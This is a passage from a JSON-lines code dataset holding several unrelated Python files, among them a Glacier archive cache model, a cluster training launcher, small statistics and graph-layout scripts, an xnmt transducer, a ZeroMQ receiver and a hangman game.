INVENTORY_LAG seconds after the archive was\n# uploaded successfully.\nINVENTORY_LAG = 24 * 60 * 60 * 3\n\nlogger = logging.getLogger(__name__)\n\nBase = sqlalchemy.ext.declarative.declarative_base()\n\nclass Cache(object):\n class Archive(Base):\n __tablename__ = 'archive'\n id = sqlalchemy.Column(sqlalchemy.String(255), primary_key=True)\n name = sqlalchemy.Column(sqlalchemy.String(255))\n size = sqlalchemy.Column(sqlalchemy.Integer)\n vault = sqlalchemy.Column(sqlalchemy.String(255), nullable=False)\n key = sqlalchemy.Column(sqlalchemy.String(255), nullable=False)\n last_seen_upstream = sqlalchemy.Column(sqlalchemy.Integer)\n created_here = sqlalchemy.Column(sqlalchemy.Integer)\n deleted_here = sqlalchemy.Column(sqlalchemy.Integer)\n\n def __init__(self, *args, **kwargs):\n self.created_here = time.time()\n super(Cache.Archive, self).__init__(*args, **kwargs)\n\n @property\n def modified(self):\n \"\"\"Return best estimate for last modification (or creation/deletion) date\"\"\"\n if self.deleted_here is not None:\n return self.deleted_here\n if self.created_here is not None:\n return self.created_here\n return last_seen_upstream\n\n Session = sqlalchemy.orm.sessionmaker()\n\n def __init__(self, key, db_driver):\n self.key = key\n if 'sqlite://' in db_driver:\n db_path = db_driver[len('sqlite:///'):]\n mkdir_p(os.path.dirname(db_path))\n initial_upgrade = False\n if not os.path.exists(db_path):\n initial_upgrade = True\n self.engine = sqlalchemy.create_engine('sqlite:///%s' % db_path)\n if initial_upgrade:\n self.upgrade_schema()\n else:\n self.engine = sqlalchemy.create_engine(db_driver)\n self.Session.configure(bind=self.engine)\n self.session = self.Session()\n\n def upgrade_schema(self):\n alembic_ini = pkg_resources.resource_filename(__name__, 'alembic.ini')\n cfg = alembic.config.Config(alembic_ini)\n alembic.command.upgrade(cfg, 'head')\n\n def add_archive(self, vault_name, name, size, archive):\n self.session.add(self.Archive(key=self.key,\n vault=vault_name, name=name, size=size,\n id=archive.id))\n self.session.commit()\n\n def _get_archive_query_by_ref(self, vault, ref):\n if ref.startswith('id:'):\n filter = {'id': ref[3:]}\n elif ref.startswith('name:'):\n filter = {'name': ref[5:]}\n else:\n filter = {'name': ref}\n return self.session.query(self.Archive).filter_by(\n key=self.key, vault=vault, deleted_here=None, **filter)\n\n def get_archive_id(self, vault, ref):\n try:\n result = self._get_archive_query_by_ref(vault, ref).one()\n except sqlalchemy.orm.exc.NoResultFound:\n raise KeyError(ref)\n return result.id\n\n def get_archive_name(self, vault, ref):\n try:\n result = self._get_archive_query_by_ref(vault, ref).one()\n except sqlalchemy.orm.exc.NoResultFound:\n raise KeyError(ref)\n return result.name\n\n def get_archive_last_seen(self, vault, ref):\n try:\n result = self._get_archive_query_by_ref(vault, ref).one()\n except sqlalchemy.orm.exc.NoResultFound:\n raise KeyError(ref)\n return result.last_seen_upstream or result.created_here\n\n def delete_archive(self, vault, ref):\n try:\n result = self._get_archive_query_by_ref(vault, ref).one()\n except sqlalchemy.orm.exc.NoResultFound:\n raise KeyError(name)\n result.deleted_here = time.time()\n self.session.commit()\n\n @staticmethod\n def _archive_ref(archive, force_id=False):\n if archive.name and not force_id:\n if (archive.name.startswith('name:') or\n archive.name.startswith('id:')):\n return \"name:%s\" % archive.name\n else:\n return archive.name\n else:\n return 'id:' + archive.id\n\n def get_archive_list_objects(self, vault):\n for archive in (\n self.session.query(self.Archive).\n filter_by(key=self.key,\n vault=vault,\n deleted_here=None).\n order_by(self.Archive.name)):\n yield archive\n\n def get_archive_list(self, vault):\n def force_id(archive):\n return \"\\t\".join([\n self._archive_ref(archive, force_id=True),\n \"%s\" % archive.name\n ])\n\n for archive_name, archive_iterator in (\n itertools.groupby(\n self.get_archive_list_objects(vault),\n lambda archive: archive.name)):\n # Yield self._archive_ref(..., force_id=True) if there is more than\n # one archive with the same name; otherwise use force_id=False.\n first_archive = next(archive_iterator)\n try:\n second_archive = next(archive_iterator)\n except StopIteration:\n yield self._archive_ref(first_archive, force_id=False)\n else:\n yield force_id(first_archive)\n yield force_id(second_archive)\n for subsequent_archive in archive_iterator:\n yield force_id(subsequent_archive)\n\n def get_archive_list_with_ids(self, vault):\n for archive in self.get_archive_list_objects(vault):\n yield \"\\t\".join([\n self._archive_ref(archive, force_id=True),\n \"%s\" % archive.name,\n ])\n\n def mark_seen_upstream(\n self, vault, id, name, size, upstream_creation_date,\n upstream_inventory_date, upstream_inventory_job_creation_date,\n fix=False):\n\n # Inventories don't get recreated unless the vault has changed.\n # See: https://forums.aws.amazon.com/thread.jspa?threadID=106541\n #\n # The cache's last_seen_upstream is supposed to contain a point in time\n # at which we know for sure that an archive existed, but this can fall\n # too far behind if a vault doesn't change. So assume that an archive\n # that appears in an inventory that hasn't been updated recently\n # nevertheless existed at around the time the inventory _could_ have\n # been regenerated, ie. at some point prior to the date that we\n # requested the inventory retrieval job.\n #\n # This is preferred over using the job completion date as an archive\n # could in theory be deleted while an inventory job is in progress and\n # would still appear in that inventory.\n #\n # Making up a date prior to the inventory job's creation could mean\n # that last_seen_upstream ends up claiming that an archive existed even\n # before it was created, but this will not cause a problem. Better that\n # it's too far back in time than too far ahead.\n #\n # With thanks to Wolfgang Nagele.\n\n last_seen_upstream = max(\n upstream_inventory_date,\n upstream_inventory_job_creation_date - INVENTORY_LAG\n )\n\n try:\n archive = self.session.query(self.Archive).filter_by(\n key=self.key, vault=vault, id=id).one()\n except sqlalchemy.orm.exc.NoResultFound:\n self.session.add(\n self.Archive(\n key=self.key, vault=vault, name=name, size=size, id=id,\n last_seen_upstream=last_seen_upstream\n )\n )\n else:\n if not archive.name:\n archive.name = name\n elif archive.name != name:\n if fix:\n logger.warn('archive %r appears to have changed name from %r ' %\n (archive.id, archive.name) + 'to %r (fixed)' % (name))\n archive.name = name\n else:\n logger.warn('archive %r appears to have changed name from %r ' %\n (archive.id, archive.name) + 'to %r' % (name))\n if not archive.size:\n archive.size = size\n elif archive.size != size:\n if fix:\n logger.warn('archive %r appears to have changed size from %r ' %\n (archive.id, archive.size) + 'to %r (fixed)' % (size))\n archive.size = size\n else:\n logger.warn('archive %r appears to have changed size from %r ' %\n (archive.id, archive.size) + 'to %r' % (size))\n if archive.deleted_here:\n archive_ref = self._archive_ref(archive)\n if archive.deleted_here < upstream_inventory_date:\n logger.warn('archive %r marked deleted but still present' %\n archive_ref)\n else:\n logger.warn('archive %r deletion not yet in inventory' %\n archive_ref)\n archive.last_seen_upstream = last_seen_upstream\n\n def mark_only_seen(self, vault, inventory_date, ids, fix=False):\n upstream_ids = set(ids)\n our_ids = set([r[0] for r in\n self.session.query(self.Archive.id)\n .filter_by(key=self.key, vault=vault).all()])\n missing_ids = our_ids - upstream_ids\n for id in missing_ids:\n archive = (self.session.query(self.Archive)\n .filter_by(key=self.key,\n vault=vault, id=id)\n .one())\n archive_ref = self._archive_ref(archive)\n if archive.deleted_here and archive.deleted_here < inventory_date:\n self.session.delete(archive)\n logger.info('deleted archive %r has left inventory; ' % archive_ref +\n 'removed from cache')\n elif not archive.deleted_here and (\n archive.last_seen_upstream or\n (archive.created_here and\n archive.created_here < inventory_date - INVENTORY_LAG)):\n if fix:\n self.session.delete(archive)\n logger.warn('archive disappeared: %r (removed from cache)' %\n archive_ref)\n else:\n logger.warn('archive disappeared: %r' % archive_ref)\n else:\n logger.warn('new archive not yet in inventory: %r' % archive_ref)\n\n def mark_commit(self):\n self.session.commit()\n","sub_path":"glacier/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":11545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"512862332","text":"import json\nimport sys\nimport time\n\nsys.path.append(\"../MachineManager\")\n\nimport ClusterAPI\nimport cluster_settings\n\nclass Task:\n\tdef __init__(self,name,machineList):\n\t\tself.name = name\n\t\tself.machineList = machineList\n\ndef get_ps_job(task_id):\n\tDockerFileName = \"TF_PS_GPU\"\n\tDockerBuildPath = \"../\"\n\tPort = \"2222\"\n\tjob = ClusterAPI.Job(DockerFileName,DockerBuildPath,Port,\"ps\",\"not_started\")\n\tjob.set_TaskId(task_id)\n\treturn job\n\ndef get_worker_job(task_id):\n\tDockerFileName = \"TF_WORKER_GPU\"\n\tDockerBuildPath = \"../\"\n\tPort = \"2222\"\n\tjob = ClusterAPI.Job(DockerFileName,DockerBuildPath,Port,\"worker\",\"not_started\")\n\tjob.set_TaskId(task_id)\n\treturn job\n\ndef get_single_job():\n\tDockerFileName = \"TF_SINGLE_GPU\"\n\tDockerBuildPath = \"../\"\n\tPort = \"2222\"\n\treturn ClusterAPI.Job(DockerFileName,DockerBuildPath,Port,\"single\",\"not_started\")\n\ndef get_machine(ip_address,machine_type,job):\n\treturn ClusterAPI.Machine(ip_address,machine_type,job) \n\n\ndef get_task_name(dataset_name,network_name):\n\treturn time.strftime('%Y:%m:%d:%H:%M:%S',time.localtime(time.time()))+\":\"+dataset_name+\":\"+network_name\n\ndef set_Task_Param_Single(cluster,json_data,task_name):\n\tbatch_size = json_data['batch_size']\n\tlearning_rate = json_data['learning_rate']\n\tnetwork = json_data['network']\n\tdataset_url = json_data['dataset_url']\n\n\tparam = {}\n\tparam['batch_size'] = batch_size\n\tparam['learning_rate'] = learning_rate\n\tparam['dataset_url'] = dataset_url\n\tparam['network'] = network\n\n\tcluster.UpdateTaskParam(task_name,param)\n\ndef set_Task_Param(cluster,json_data,task_name,ps_spec,worker_spec,port):\n\tbatch_size = json_data['batch_size']\n\tlearning_rate = json_data['learning_rate']\n\tnetwork = json_data['network']\n\tdataset_url = json_data['dataset_url']\n\n\tparam = {}\n\tparam['batch_size'] = batch_size\n\tparam['learning_rate'] = learning_rate\n\tparam['dataset_url'] = dataset_url\n\tparam['network'] = network\n\tparam['ps_spec'] = ps_spec\n\tparam['worker_spec'] = worker_spec\n\tparam['port'] = port\n\n\tcluster.UpdateTaskParam(task_name,param)\n\n\ndef Train(json_data):\n\t# connect_url = [\"localhost:27017\"]\n\tconnect_url = cluster_settings.connect_url\n\tcluster = ClusterAPI.Cluster(connect_url)\n\tnodes = cluster.get_AviableMachines()\n\tprint(nodes)\n\tif len(nodes)>1:\n\t\tmachineList = []\n\t\tps_machine = get_machine(nodes[0],\"gpu\",get_ps_job(0))\n\t\tmachineList.append(ps_machine)\n\t\tfor i in range(1,len(nodes)):\n\t\t\tworker_machine = get_machine(nodes[i],\"gpu\",get_worker_job(i-1))\n\t\t\tmachineList.append(worker_machine)\n\t\tdataset_name = json_data['dataset_name']\n\t\tnetwork_name = json_data['network_name']\n\t\ttask_name = get_task_name(dataset_name,network_name)\n\t\ttask = ClusterAPI.Task(task_name,machineList)\n\t\tps_spec = [nodes[0]]\n\t\tworker_spec = nodes[1:]\n\t\tset_Task_Param(cluster,json_data,task_name,ps_spec,worker_spec,\"2222\")\n\t\tcluster.AddTask(task)\n\t\terror_list = cluster.AssignTask(task)\n\telif len(nodes)==1:\n\t\tmachineList = []\n\t\tsingle_machine = get_machine(nodes[0],\"gpu\",get_single_job())\n\t\tmachineList.append(single_machine)\n\t\tdataset_name = json_data['dataset_name']\n\t\tnetwork_name = json_data['network_name']\n\t\ttask_name = get_task_name(dataset_name,network_name)\n\t\ttask = ClusterAPI.Task(task_name,machineList)\n\t\tset_Task_Param_Single(cluster,json_data,task_name)\n\t\tcluster.AddTask(task)\n\t\terror_list = cluster.AssignTask(task)\n\t\tprint(task_name)\n\n\njson_data = {}\njson_data['dataset_name'] = \"cifar-10\"\njson_data['network_name'] = \"conv_net\"\njson_data['batch_size'] = 200\njson_data['learning_rate'] = 0.01\njson_data['dataset_url'] = \"./cifar-10-batches-py\"\nwith open('./test.json',\"r\") as json_file:\n\tjson_obj = json.load(json_file)\nnetwork = json.dumps(json_obj)\njson_data['network'] = network\n\nTrain(json_data)\n","sub_path":"DeepLearningManager/Train.py","file_name":"Train.py","file_ext":"py","file_size_in_byte":3677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"496537157","text":"import pandas as pd\r\nimport statistics\r\n\r\ndf = pd.read_csv(\"data.csv\")\r\ndata1 = df[\"math score\"].tolist()\r\ndata2 = df[\"reading score\"].tolist()\r\ndata3 = df[\"writing score\"].tolist()\r\n\r\ndata = []\r\n\r\nrow = 0\r\n\r\nfor i in data1:\r\n k = int(data1[row]) + int(data2[row]) + int(data3[row])\r\n data.append(k)\r\n row = row + 1\r\n\r\nprint(data)\r\n\r\nmean = statistics.mean(data)\r\n\r\nsd = statistics.stdev(data)\r\n\r\nrange1h_min, range1h_max = mean - sd, mean + sd\r\nrange2h_min, range2h_max = mean - 2*sd, mean + 2*sd\r\nrange3h_min, range3h_max = mean - 3*sd, mean + 3*sd\r\n\r\n#range1h = []\r\n#for i in data:\r\n #if i > range1h_min and i < range1h_max:\r\n #range1h.append(i)\r\n\r\n#One line code from the above for loop\r\nrange1h = [i for i in data if i > range1h_min and i < range1h_max] \r\nrange2h = [i for i in data if i > range2h_min and i < range2h_max]\r\nrange3h = [i for i in data if i > range3h_min and i < range3h_max]\r\n\r\nrange1length = len(range1h)\r\nrange2length = len(range2h)\r\nrange3length = len(range3h)\r\n\r\ndatalength = len(data)\r\n\r\nrange1_percentage = (range1length/datalength) * 100\r\nrange2_percentage = (range2length/datalength) * 100\r\nrange3_percentage = (range3length/datalength) * 100\r\n\r\nprint(\"Range 1 percentage = \" + str(range1_percentage), \", Range 2 percentage = \" + str(range2_percentage),\", Range 3 percentage = \" + str(range3_percentage))","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"88649259","text":"\r\nimport networkx as nx\r\nimport igraph as ig\r\nfrom igraph import *\r\n\r\nG = Graph.Read_GraphML(\"karate.GraphML\") #igraph version of data for partitioning\r\n\r\nFR = nx.read_graphml(\"karate.GraphML\")\r\n\r\n# setup various FR iterations\r\niters = 2\r\n\r\nnumNodes=len(G.vs)\r\n\r\n# FR layout\r\nseedPos=G.layout_grid()\r\n\r\nposFR=G.layout(\"fr\", seed=seedPos, maxiter=iters, minx = [10]*numNodes, maxx=[500]*numNodes, miny=[0]*numNodes, maxy=[500]*numNodes)\r\n\r\n# Spread out positions\r\nposFR2=[0 for pair in posFR]\r\n\r\nfor idx,pair in enumerate(posFR):\r\n posFR2[idx] = [x*7 for x in pair]\r\n\r\n# initialize all nodes to have group array, x and y coordinates\r\nfor idx,n in enumerate(FR.nodes()):\r\n FR.node[n]['group']=[0]\r\n FR.node[n]['y']=posFR2[idx][1]\r\n FR.node[n]['x']=posFR2[idx][0]\r\n \r\n# KK layout\r\n# posKK=\r\n\r\n# Turn networkx graph into a json:\r\n\r\nfrom networkx.readwrite import json_graph\r\nimport json\r\n\r\ndata=json_graph.node_link_data(FR)\r\n# print data['nodes']\r\nwith open('fr2.js', 'w') as outfile:\r\n json.dump(data, outfile)\r\n\r\n","sub_path":"python/compareLayoutsFR.py","file_name":"compareLayoutsFR.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"653292246","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Python example\n\n# In[2]:\n\n\nimport koma, koma.oma\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom scipy.signal import resample, detrend\n\nimport pandas as pd\n\n\n# ## Load data and define input\n# \n\n# In[13]:\n\n\n# Import and specify properties of input data\ndf = pd.read_csv('response_data.csv', sep=',',header=None)\ndata = df.values # data including noise\nlevels = 3\nfs = 35\nt = np.arange(0,1/fs*(data.shape[0]),1/fs)\n\n# Cov-SSI settings\ni = 20\ns = 4\norders = np.arange(2, 50+2, 2)\nstabcrit = {'freq':0.2, 'damping': 0.2, 'mac': 0.3}\n\n# Noise specification\nnoise_factor = 1.0\n\n\n# ## Add artificial noise and plot response\n\n# In[4]:\n\n\nnoise = np.std(data) * noise_factor\ndata_noised = data + noise*np.random.randn(data.shape[0], data.shape[1])\n\nfig, ax = plt.subplots(nrows=3, ncols=1, num=1)\nax[0].plot(t, data_noised[:,0])\nax[0].plot(t, data[:,0], color='IndianRed', alpha=1)\nax[1].plot(t, data_noised[:,3])\nax[1].plot(t, data[:,3], color='IndianRed', alpha=1)\nax[2].plot(t, data_noised[:,6])\nax[2].plot(t, data[:,6], color='IndianRed', alpha=1)\n\n__ = [a.set_xticks([]) for a in ax[0:2]]\n__ = ax[2].set_xlabel('Time [s]')\n\n__ = ax[0].set_ylabel('Level 3')\n__ = ax[1].set_ylabel('Level 2')\n__ = ax[2].set_ylabel('Level 1')\n\n\n# ## Preprocess\n\n# In[5]:\n\n\nfs_rs = 3 # resample frequency\ndata_rs = resample(detrend(data), int(np.ceil(data.shape[0]*fs_rs/fs)), axis=0) # detrend and resample\nfs_rs = data_rs.shape[0]/data.shape[0]*fs\n\n\n# ## Cov-SSI call\n\n# In[6]:\n\n\nlambd, phi = koma.oma.covssi(data_rs, fs_rs, i, orders)\n\n\n# ## Postprocessing and visualization\n\n# In[14]:\n\n\n# Establishing stable poles\ns = 2\nlambd_stab, phi_stab, orders_stab, ix_stab = koma.oma.find_stable_poles(lambd, phi, orders, s, stabcrit=stabcrit)\n\n\n# In[15]:\n\n\n# \nprint(lambd_stab)\n\n","sub_path":"examples/python/python_example.py","file_name":"python_example.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"583023883","text":"import dynet as dy\n\nfrom xnmt.transducer import SeqTransducer, FinalTransducerState\nfrom xnmt.persistence import Serializable, serializable_init\nfrom xnmt.expression_sequence import ExpressionSequence\nfrom xnmt.param_collection import ParamManager\n\nclass FullyConnectedSeqTransducer(SeqTransducer, Serializable):\n yaml_tag = '!FullyConnectedSeqTransducer'\n\n @serializable_init\n def __init__(self, in_height, out_height, nonlinearity='linear'):\n \"\"\"\n Args:\n in_height: input dimension of the affine transform\n out_height: output dimension of the affine transform\n nonlinearity: nonlinear activation function\n \"\"\"\n model = ParamManager.my_params(self)\n self.in_height = in_height\n self.out_height = out_height\n self.nonlinearity = nonlinearity\n\n normalInit=dy.NormalInitializer(0, 0.1)\n self.pW = model.add_parameters(dim = (self.out_height, self.in_height), init=normalInit)\n self.pb = model.add_parameters(dim = self.out_height)\n\n def get_final_states(self):\n return self._final_states\n\n def transduce(self, embed_sent):\n src = embed_sent.as_tensor()\n\n W = dy.parameter(self.pW)\n b = dy.parameter(self.pb)\n\n l1 = dy.affine_transform([b, W, src])\n output = l1\n if self.nonlinearity is 'linear':\n output = l1\n elif self.nonlinearity is 'sigmoid':\n output = dy.logistic(l1)\n elif self.nonlinearity is 'tanh':\n output = 2*dy.logistic(l1) - 1\n elif self.nonlinearity is 'relu':\n output = dy.rectify(l1)\n output_seq = ExpressionSequence(expr_tensor=output)\n self._final_states = [FinalTransducerState(output_seq[-1])]\n return output_seq\n\n","sub_path":"xnmt/ff.py","file_name":"ff.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"234386309","text":"class ResolutionFilter(object):\n\t@staticmethod\n\tdef is_valid(obj_wall, obj_res, obj_ratio):\n\t\timg_res = obj_wall.get_resolution()\n\t\timg_ratio = obj_wall.get_ratio()\n\t\t\n\t\tfor res, ratio in zip(obj_res.get_resolutions(), obj_ratio.get_ratios()):\n\t\t\tif img_res[0] >= res[0] and img_res[1] >= res[1] and img_ratio == ratio:\n\t\t\t\treturn True\n\n\t\treturn False","sub_path":"ENTERPRISE/filters/ResolutionFilter.py","file_name":"ResolutionFilter.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"386755019","text":"import numpy as np\n\n# 1d FEM Solver for Time Dependent Diffusion Reaction Equation\n\n\ndef gquad_colloc(n):\n \"\"\"Function to return collocation position (zeta) and gaussian weights (w)\n\n Input:\n n -- number of collocation points\n Return:\n zeta -- n vector of collocation abscissa\n w -- n vector of gaussian weights at collocation points\n \"\"\"\n zeta = []\n w = []\n if n == 2:\n zeta = np.array([-0.577350269189626,\n 0.577350269189626])\n w = np.array([1,\n 1])\n elif n == 3:\n zeta = np.array([0,\n -0.7745966692414834,\n 0.7745966692414834])\n w = np.array([0.8888888888888888,\n 0.5555555555555556,\n 0.5555555555555556])\n elif n == 4:\n zeta = np.array([-0.3399810435848563,\n 0.3399810435848563,\n -0.8611363115940526,\n 0.8611363115940526])\n w = np.array([0.6521451548625461,\n 0.6521451548625461,\n 0.3478548451374538,\n 0.3478548451374538])\n elif n == 5:\n zeta = np.array([0,\n -0.5384693101056831,\n 0.5384693101056831,\n -0.9061798459386640,\n 0.9061798459386640])\n w = np.array([0.5688888888888889,\n 0.4786286704993665,\n 0.4786286704993665,\n 0.2369268850561891,\n 0.2369268850561891])\n else:\n print(\"Higher order not yet implemented.\")\n return zeta, w\n\n\ndef gquad(function, a, b, n=2):\n \"\"\"Function for n point gaussian quadrature\n\n Input:\n function -- function to be integrated\n a -- lower bound for integration\n b -- upper bound for integration\n n -- n-point gaussian quadrature. Default = 2\n Return:\n result -- integration value\n \"\"\"\n result = 0\n zeta, w = gquad_colloc(n)\n x = (b - a) / 2 * zeta + (b + a) / 2\n for (xc, wc) in zip(x, w):\n result += wc * function(xc)\n result *= (b - a) / 2\n return result\n\n\ndef fem_solver(v, elem, diff, tau, ic, b, bc, bc_type, dt, nt):\n \"\"\"Function for finite element method solver for diffusion reaction equation in project 7\n\n Input:\n v -- #v by 1 position of vertices (nodes)\n elem -- #elem by 2 position of elements. Contain vertex ids\n diff -- function for diffusivity\n tau -- function for reaction rate tau\n ic -- #v by 1 initial condition\n b -- #b by 1 id of boundary nodes\n bc -- #b by 1 value at corresponding boundary nodes\n bc_type -- #b by 1 boundary type. 0 for Dirichlet condition, 1 for Neumann condition.\n dt -- time step size\n nt -- number of time steps\n\n Return:\n u -- nt by #v solution on nodes\n \"\"\"\n\n n_node = v.shape[0]\n n_elem = elem.shape[0]\n u = np.zeros([nt + 1, n_node])\n # construct element-wise K, M, Mt matrix\n # construct element-wise R vector\n k_e = np.zeros([n_elem, 2, 2])\n m_e = np.zeros([n_elem, 2, 2])\n mt_e = np.zeros([n_elem, 2, 2])\n for e in range(n_elem): # loop through elements\n x_elem = v[elem[e, :]]\n # stiffness and load\n k_e[e, :, :], m_e[e, :, :], mt_e[e, :, :] = construct_fem_matrix(diff, tau, dt, x_elem)\n # construct global matrix\n k_global = np.zeros([n_node, n_node])\n m_global = np.zeros([n_node, n_node])\n mt_global = np.zeros([n_node, n_node])\n r_global = np.zeros([n_node])\n for e in range(n_elem): # iterate through element\n for i in range(k_e.shape[1]):\n for j in range(k_e.shape[2]):\n k_global[elem[e, i], elem[e, j]] += k_e[e, i, j]\n m_global[elem[e, i], elem[e, j]] += m_e[e, i, j]\n mt_global[elem[e, i], elem[e, j]] += mt_e[e, i, j]\n if bc_type[0] == 1:\n r_global[b[0]] = bc[0]\n if bc_type[-1] == 1:\n r_global[b[-1]] = -bc[-1]\n MK = k_global + m_global\n MK[0, :] = np.zeros([MK.shape[1]])\n MK[0, 0] = 1\n MK_inv = np.linalg.inv(MK)\n # march in time and calculate profile\n u[0, :] = ic # set initial condition\n for it in range(1, nt+1):\n A = r_global+np.dot(mt_global, u[it-1, :])\n A[0] = bc[0]\n u[it, :] = np.dot(MK_inv,A)\n\n return u\n\n\ndef construct_fem_matrix(diff, tau, dt, x):\n n = 5 # Gaussian integration order\n k_ij, m_ij, mt_ij, r_i = np.zeros([2, 2]), np.zeros([2, 2]), np.zeros([2, 2]), np.zeros([2])\n x_zeta = lambda zeta: 0.5 * (x[0] + x[-1]) + zeta / 2 * (x[-1] - x[0])\n dzeta_dx = lambda zeta: 2 / (x[-1] - x[0])\n # k matrix\n kf_00 = lambda zeta: 1 / 4 * diff(x_zeta(zeta)) * dzeta_dx(zeta)\n k_ij[0, 0] = gquad(kf_00, -1, 1, n=n)\n k_ij[1, 1] = k_ij[0, 0]\n k_ij[1, 0] = -k_ij[0, 0]\n k_ij[0, 1] = -k_ij[0, 0]\n # m matrix\n mf_00 = lambda zeta: 1 / 4 * ((zeta - 1) ** 2) * (tau(x_zeta(zeta)) + 1 / dt) / dzeta_dx(zeta)\n mf_01 = lambda zeta: -1 / 4 * (zeta ** 2 - 1) * (tau(x_zeta(zeta)) + 1 / dt) / dzeta_dx(zeta)\n mf_11 = lambda zeta: 1 / 4 * ((zeta + 1) ** 2) * (tau(x_zeta(zeta)) + 1 / dt) / dzeta_dx(zeta)\n\n m_ij[0, 0] = gquad(mf_00, -1, 1, n=n)\n m_ij[1, 1] = gquad(mf_11, -1, 1, n=n)\n m_ij[1, 0] = gquad(mf_01, -1, 1, n=n)\n m_ij[0, 1] = gquad(mf_01, -1, 1, n=n)\n # mt matrix\n mtf_00 = lambda zeta: 1 / 4 * ((zeta - 1) ** 2) * (1 / dt) / dzeta_dx(zeta)\n mtf_01 = lambda zeta: -1 / 4 * (zeta ** 2 - 1) * (1 / dt) / dzeta_dx(zeta)\n mtf_11 = lambda zeta: 1 / 4 * ((zeta + 1) ** 2) * (1 / dt) / dzeta_dx(zeta)\n mt_ij[0, 0] = gquad(mtf_00, -1, 1, n=n)\n mt_ij[1, 1] = gquad(mtf_11, -1, 1, n=n)\n mt_ij[1, 0] = gquad(mtf_01, -1, 1, n=n)\n mt_ij[0, 1] = gquad(mtf_01, -1, 1, n=n)\n\n return k_ij, m_ij, mt_ij\n\n\ndef mesh_setup(x_0=0, L=1, n_elem=3, v=[], order=1):\n \"\"\"Function to setup the uniform mesh of a given order\n\n Input:\n n_elem -- #elem\n order -- #order of polynomial\n Return:\n v -- #v by 1 position of vertices (nodes)\n elem -- #elem by polyOrder+1 position of elements. Contain vertex ids in each element\n \"\"\"\n if v == []:\n v = np.linspace(x_0, L, order * n_elem + 1) # uniform nodes\n else:\n n_elem = v.shape[0] - 1\n elem = np.zeros([n_elem, order + 1], dtype=int) # connectivity\n for col in range(order + 1):\n elem[:, col] = np.arange(col, col + order * (n_elem - 1) + 1, order, dtype=int)\n return v, elem\n","sub_path":"ME280/Homework/fem_dr.py","file_name":"fem_dr.py","file_ext":"py","file_size_in_byte":6619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"367549805","text":"import time\nimport zmq\nimport time\n\ncontext = zmq.Context()\nsocket = context.socket(zmq.DEALER)\nidentity = u'receiver'\nsocket.identity = identity.encode('utf-8')\nsocket.connect('ipc://router')\nprint('Client %s started' % (identity))\nwhile True:\n msg = socket.recv()\n print('Client received: %s' % msg)\n\nsocket.close()\ncontext.term()","sub_path":"reciever.py","file_name":"reciever.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"596493814","text":"import random, os\n\ndef get_words(file_path):\n with open(file_path) as file:\n word_list = file.read().splitlines()\n return word_list\n\ndef logger(msg=None):\n # cross-platform clears stdout\n os.system('cls' if os.name == 'nt' else 'clear')\n if msg:\n print(msg)\n\ndef print_word(word, char_left):\n for char in word:\n if char in char_left:\n print('_', end=\" \")\n else:\n print('{} '.format(char), end=\" \")\n print('')\n\ndef game_loop(word):\n char_count = len(word)\n char_left = list(set(word))\n attempt = 5\n\n logger('This word has {} letter(s)'.format(char_count))\n while attempt != 0 and len(char_left) != 0:\n print_word(word, char_left)\n print('{} attempt(s) left'.format(attempt))\n inp = input('guess character: ')\n if inp not in char_left and inp not in word:\n logger('Incorrect!!')\n attempt -= 1\n elif inp not in char_left and inp in word:\n logger('You already got that one!!')\n else:\n logger('Correct!!')\n char_left.remove(inp)\n\n if len(char_left) == 0:\n logger('Victory!! Of course, the word is {}'.format(word))\n else:\n logger('Lost!! The mysterious word is {}'.format(word))\n\ndef main():\n word_list = get_words('programs/words.txt')\n\n play = 'Y'\n while play == 'Y':\n word = random.choice(word_list)\n game_loop(word)\n play = input('Continue? (Y/n): ')\n while play != 'Y' and play != 'n':\n logger('Invalid answer!')\n play = input('Continue? (Y/n): ') \n\n\n \n\nmain()\n","sub_path":"programs/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"651689963","text":"\n\nfrom xai.brain.wordbase.nouns._frump import _FRUMP\n\n#calss header\nclass _FRUMPS(_FRUMP, ):\n\tdef __init__(self,): \n\t\t_FRUMP.__init__(self)\n\t\tself.name = \"FRUMPS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"frump\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_frumps.py","file_name":"_frumps.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"539595507","text":"import logging\nimport sys\n\ntry:\n from yaml import CLoader as Loader\nexcept ImportError:\n logging.critical(\"Failed to load CLoader for YAML. You should definitely install that before proceeding.\")\n sys.exit(1)\n from yaml import Loader\n\nimport oonilyzer\nimport oonilyzer.models.s3\nimport oonilyzer.helpers.files\nimport oonilyzer.helpers.types\nimport oonilyzer.helpers.usability\n\nimport multiprocess as mp\nimport ujson as json\nimport pandas as pd\nimport logging\nimport tqdm\nimport pprint\nimport boto3\nimport copy\nimport yaml\nimport os\nimport io\nimport gc\n\nboto3.set_stream_logger('boto3.resources', logging.WARNING)\n\nlogger = 